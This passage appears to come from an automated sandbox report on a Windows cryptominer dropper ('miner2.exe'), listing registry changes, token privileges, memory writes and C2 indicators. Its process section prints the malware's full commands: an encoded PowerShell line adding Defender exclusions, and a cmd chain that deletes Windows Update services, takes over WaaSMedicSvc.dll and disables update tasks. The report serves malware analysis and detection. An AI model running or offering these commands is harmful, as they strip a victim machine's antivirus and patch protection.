N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Google\Chrome\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Google\Chrome\updater.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Temp\miner2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2648 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe C:\Windows\Temp\miner2.exe
PID 2648 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe C:\Windows\Temp\miner2.exe
PID 3228 wrote to memory of 3540 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3228 wrote to memory of 3540 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3228 wrote to memory of 3412 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 3228 wrote to memory of 3412 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 3228 wrote to memory of 4400 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 3228 wrote to memory of 4400 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 3412 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4400 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4400 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3412 wrote to memory of 4576 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 4576 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 1180 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 1180 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 2748 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 2748 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4400 wrote to memory of 1132 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4400 wrote to memory of 1132 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3412 wrote to memory of 1908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 1908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 4404 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4404 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4400 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4400 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3412 wrote to memory of 2864 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 2864 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 3680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 3680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4400 wrote to memory of 4660 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4400 wrote to memory of 4660 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3412 wrote to memory of 1816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 1816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3412 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3412 wrote to memory of 1196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3412 wrote to memory of 1196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3412 wrote to memory of 4648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4372 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4372 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4700 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4700 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 4756 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 4756 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 2164 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 2164 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 5036 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 5036 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 3324 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 3324 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 4016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 4016 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 2008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 2008 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3228 wrote to memory of 4432 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3228 wrote to memory of 4432 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe

"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"

C:\Windows\Temp\miner2.exe

"C:\Windows\Temp\miner2.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\system32\sc.exe

sc stop UsoSvc

C:\Windows\system32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

